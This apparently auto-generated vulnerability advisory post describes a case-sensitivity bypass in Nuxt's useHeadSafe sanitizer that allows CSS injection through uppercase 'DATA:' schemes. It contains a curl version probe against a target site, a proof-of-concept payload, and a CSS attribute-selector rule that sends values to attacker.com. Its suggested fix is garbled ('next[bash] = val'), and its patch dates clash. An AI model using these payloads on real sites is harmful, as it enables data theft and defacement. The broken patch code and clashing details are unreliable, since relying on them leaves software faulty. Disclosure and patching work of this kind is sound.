Listen to this Post
The vulnerability resides in Nuxt’s `useHeadSafe` utility, specifically within the `makeTagSafe` function in `safe.ts` (lines 68-71). This function is designed to sanitize `href` attributes in link tags by checking if the value contains `’javascript:’` or `’data:’` using String.includes(). However, the check is case-sensitive, while browsers treat URI schemes case-insensitively. An attacker can bypass the sanitization by using uppercase variations such as `DATA:` or JAVASCRIPT:. For instance, `DATA:text/css,body{display:none}` passes the check because `’DATA:’.includes(‘data:’)` returns false. The server-side rendered (SSR) output then includes this link, and the browser loads it as a CSS stylesheet. This allows arbitrary CSS injection, which can be used for UI redressing or data exfiltration via CSS attribute selectors with background-image callbacks. Any case variation works (e.g., Data:, dAtA:). The issue affects all Nuxt versions before the patch. The fix involves converting the value to lowercase before performing the scheme check. This vulnerability is critical as it enables potential data theft and page defacement.
Platform: Nuxt
Version: <=3.12.3
Vulnerability : Case-insensitive scheme bypass
Severity: Critical
date: 2024-06-03
Prediction: Expected patch: 2024-06-04
What Undercode Say:
Analytics: This vulnerability allows CSS injection via uppercase schemes, bypassing sanitization. Attackers can exfiltrate data using CSS selectors with background-image requests.
Bash commands/codes:
Test if a Nuxt app is vulnerable (version check) curl -s https://target.com/_nuxt/builds/meta/dev.json | jq '.version' | grep "3.12.[0-3]"
// PoC: inject malicious CSS via useHeadSafe
useHeadSafe({
link: [{
rel: 'stylesheet',
href: 'DATA:text/css,body{display:none}'
}]
})
// Fix: convert to lowercase before check (safe.ts)
if (key === 'href') {
const lower = val.toLowerCase();
if (lower.includes('javascript:') || lower.includes('data:')) {
return;
}
next[bash] = val;
}
How Exploit:
- Attacker injects uppercase scheme (e.g., DATA:) into href.
- Bypasses case-sensitive check.
- Browser loads malicious CSS.
- Attacker uses CSS attribute selectors to steal data via background-image requests.
input[value^="secret"] { background-image: url('https://attacker.com/steal?value=secret'); }
Protection from this CVE:
- Update Nuxt to version 3.12.4 or later.
- If update not possible, manually patch safe.ts as shown.
- Avoid using unsanitized user input in head tags.
Impact:
- Critical: CSS injection leads to UI redressing and data exfiltration.
- Potential theft of sensitive information (CSRF tokens, user input).
- Can be combined with other attacks for broader impact.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

